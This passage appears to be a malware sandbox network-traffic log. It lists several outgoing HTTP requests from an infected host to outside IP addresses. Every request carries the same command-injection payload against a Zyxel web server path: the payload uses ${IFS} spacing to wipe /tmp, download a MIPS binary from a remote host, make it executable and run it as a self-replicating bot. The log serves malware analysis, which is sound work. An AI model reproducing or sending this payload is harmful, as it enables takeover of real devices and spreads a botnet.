                        3383192.168.2.1438638209.110.118.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.232994080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3384192.168.2.1437350186.75.12.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.233031988 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3385192.168.2.145001292.114.240.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.233086109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3386192.168.2.145630659.252.117.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:42.233107090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDest